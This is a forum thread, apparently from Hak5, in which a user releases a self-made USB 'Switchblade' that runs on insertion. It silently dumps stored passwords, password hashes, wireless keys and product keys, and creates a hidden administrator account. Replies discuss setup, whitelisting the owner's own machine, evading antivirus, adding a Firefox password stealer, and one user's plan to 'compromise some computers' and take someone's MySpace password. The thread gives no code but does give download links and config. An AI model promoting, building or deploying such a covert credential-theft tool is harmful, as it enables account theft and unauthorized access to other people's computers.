Jump to content

Obi-Wahn's Switchblade


Obi-Wahn

Recommended Posts

Hello everybody!

Today, I'll release my self coded switchblade. It's a complete package, including all tools needed.

Download U3P Package: http://www.autohotkey.net/~Obi-Wahn/hak5/m...Switchblade.u3p

Download Non-U3 Package with .exe: http://www.autohotkey.net/~Obi-Wahn/hak5/m...e_exe_nonu3.zip

Download Non-U3 Package with .bat: http://www.autohotkey.net/~Obi-Wahn/hak5/m...chblade_bat.zip

Download Manual (.pdf): http://www.autohotkey.net/~Obi-Wahn/hak5/m...de/swbl_man.pdf

Download Manual (.doc): http://www.autohotkey.net/~Obi-Wahn/hak5/m...de/swbl_man.doc

Info's:

The U3 Package works full. The Non-u3 Package (.exe and .bat) works also, but there are "quick and dirty" coded. So (especially the .bat package) may the downloader checks the sourcecode again. I've only written this because not everyone want to learn AHK or is able to "understand" ahk.

Post Bugs and Errors here, send a PM or a Mail.

And a feedback 'd be nice.

Regards

Obi-Wahn

EDIT: Sorry, I had to hurry up yesterday.

My U3 Switchblade is written in AutoHotkey, which is similar to Auto-IT.

How to install and configure this tool is in the Manual.

It is possible to:

Dump System Information's  (including Computername, Username, Adminstate of the user, Systemroot-, Application- , common application- and Comspec-path, Operating System, Language and Screen-Res, including a network information dump all in one file)

Stop any kind of process

Copy the clipboard to a file

Dump Passwords from the Protected Storage

Dump Network passwords

dump Messenger Passwords

dump Mailpasswords

Dump History of the IE

dump and decrypt passwords of Opera's wand file (if exist, works at least up to version 9.10)

dump productkeys

Dump User Password hashes

dump dial-up passwords

dump IE Passwords

dump wireless passwords

dump SID

dump a list of installed software, including hotfixes

dump a list of services

dump a list of tcp connections

dumps and decrypts the ASP.Net Account password

Create a new, administrative user (username and password stored into the .ini), including German and English language support for success report

Start Additional Programs, stored into the .ini, including optional hidden starting

Trys to restart the terminated processes after finishing

Further is it possible to add computers (in combination with the username) to a "watchlist". If the computer with the current user is into the list, the program will exit without dumping any data.

It's possible to use the .exe without any other stuff to use the process-terminate-routine, the process-restart-routine, the sysinfo and the user-creation as standalone (.ini is needed) tool.

For Standalone usage, read the manual or type "switchblade.exe /?"

Developers are also welcome. Type "switchblade.exe /Src" to append the sourcecode to a file or -if you use the u3p package- hold CTRL down, while starting the Switchblade. Then it will append the sourcecode to a file and exit the program.

All tools are included.

Link to comment
Share on other sites

Hmm... I think .u3p can only work with a stock U3 drive. I guess that I will have to find the restore .exe. Does this run automatically, or do you have to click a button? I haven't grabbed the manuals yet, so those will help. What does it do?

Link to comment
Share on other sites

Sorry. I had to hurry up yesterday. However. Usage added @ first post.

Yes, the .u3p package has to use with a Stock u3 drive (which I use).

After installation of the u3 package, you have to go to the manage programs dialog, and activate "start on insertion" for the switchblade.

Then (without terminating and restarting processes) it takes about 45 Seconds, depending on the computer to dump all informations.

I've configurated my switchblade not to kill and restart processes. I've only added this feature if e.g. a scanner detects a tool as a virus, but scanned with Avast, AVG and Norton, nothing happend.

Link to comment
Share on other sites

Well, I just downloaded the LPInstaller.exe and I am backing up my thumb drive, so soon I will be able to test this. In the meantime, I downloaded the bat version and have to say that the code looks great. This is a really great payload.

EDIT: Yay! I installed it! I have a few questions for you: How do you configure what your computer is in the u3p package? By "Start on insertion," do you mean this: (click for larger picture)

63263673.png

Link to comment
Share on other sites

After installation of the Package, you have to start the switchblade on your computer.

It'll create a hidden Directory "Switchblade" on the writeable partition. there are two files into. A processlist and a .ini-File.

In the .ini File, there's a Section called Mycomputers. There you can add computers / users to ignore by adding lines like "index=Computername_username".

on startup, it checks the section and if it's plugged into a system with the correct Computer_Username combination, it'll exit.

Example:

[MYCOMPUTERS]
# If you want to add more Computer-User combinations
# Write in every line a Array of numbers. Eg:
# 1=Computername_Username
# 2=...
# ...
1=OBI-WAHN_Andreas
2=ANDREAS_Obi-Wahn

This is my configuration. The #1 entry is filled in by starting the package the first time. so you have to plugged it into your computer while starting.

Yes. I mean this dialog.

Link to comment
Share on other sites

Thanks, Obi-Wahn. I never had noticed the .ini file. It's all configured now, all I need to do is compromise some computers.  :twisted: . By the way, they have a ninja smiley on these boards! :ninja: . It's so awesome.

Link to comment
Share on other sites

@Charlie: Believe it or not, I wasn't ever on myspace, so may your post is joke (cause of "lol") or not. If not, show me a tool, and I'll try it.

@setzer: Actually, I've tested it only on AVG, Norman and Avast AV. And there wasn't any beep (accordingly to ZA Firewall). And I've add a FF password reader, which works on a testinstallation of FF on my machine. Setting into the .ini File: Section "DUMP", Key "FFPasswords"

Link to comment
Share on other sites

So none of the AVs pick  this one up as of yet? even if u have it pull all the passwords? Also would it be possible to add a Firefox Password Puller?

@setzer: Actually, I've tested it only on AVG, Norman and Avast AV. And there wasn't any beep (accordingly to ZA Firewall). And I've add a FF password reader, which works on a testinstallation of FF on my machine. Setting into the .ini File: Section "DUMP", Key "FFPasswords"

NOD32 detects the usual (dialupass.exe, pspv.exe). I'm assuming the only difference between your "tools" and other payloads is you have used the most recent versions? (eg mailpv.exe)

Link to comment
Share on other sites

I was just wondering (i.e. myspace pw ) Your Switchblade seems to retrieve everything else  :P,,, Im still looking to see if there is a cookie stored for it or not,,, If not then keylogger is pretty much the only way I guess...  :?

Link to comment
Share on other sites

Wow, you're really adamant about getting MySpace passwords. MySpace is no different than any other website, that is, technologically. I don't think I will extol the "virtues" of MySpace at this point in time. But, back to what I was talking about. If the user has the password set to auto fill, LSA Secrets, IE Password, DeWand (UnWand?), or Firefox Password should grab it.

Link to comment
Share on other sites

  • 3 weeks later...

I just tried this one out dude, and I gotta say, very nice job! :D

I did run into a little problem though.  See, I was testing this on my other laptop, so when I ran the file the first time, it recorded my comp's name, and since it's set to skip over your own comp without dumping anything, the first 3 times I tried it, I didn't get any output.  Then I realized that I'm a moron and edited that option, and it worked great :D

Link to comment
Share on other sites

  • 5 weeks later...

i installed the u3 version of this.  when i first opened it, it said is this the first time using this program or w/e i clicked yes.  then nothing happened, i thought there was supposed to be like an int file and config file so i can like change the options but i dunno where it is.  its not on the flash drive.

Link to comment
Share on other sites

i installed the u3 version of this.  when i first opened it, it said is this the first time using this program or w/e i clicked yes.  then nothing happened, i thought there was supposed to be like an int file and config file so i can like change the options but i dunno where it is.  its not on the flash drive.

the part where you click yes is so that it dont steal passwords on ur computer and to get to the config u go to the spot the documents part is and set ur computer to show hidden files and there should be a file there that says dump right click it and tell it to open it with notepad and there is the config u can change.  make sure u dont go into the document folder go to where u see where it says documents.

Link to comment
Share on other sites

  • 1 month later...

Hey Obi, I really like the way you made this thing so that it can be added to the LP on my U3, but I ran into a bit of a problem. See, I wanted to add the USB HackSaw to that Switchblade you made, but I can't "just add Hacksaw to your existing Switchblade by copying the SBS folder inside the CMD folder and add the go.cmd to your current go.cmd." because there's no SBS or CMD folders. Do you think you could make a version of the USB HackSaw that's similar to your version of the USB Switchblade? Cause that would be awesome...

thanks in advance

--Skunkfoot

Link to comment
Share on other sites

I do have a couple of questions.

1. Is the package installed to the non writable portion of the U3 drive?

2. If an AV picks anything up, will it destroy the files or prevent them from running? 

Also in the folder where the dump is located at I see a bunch of ff_passwordsXX.txt when I open up these files I see an error that states what is this error?

Initialization failed , Make sure key3.db and cert8.db

files are present in the specified directory

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...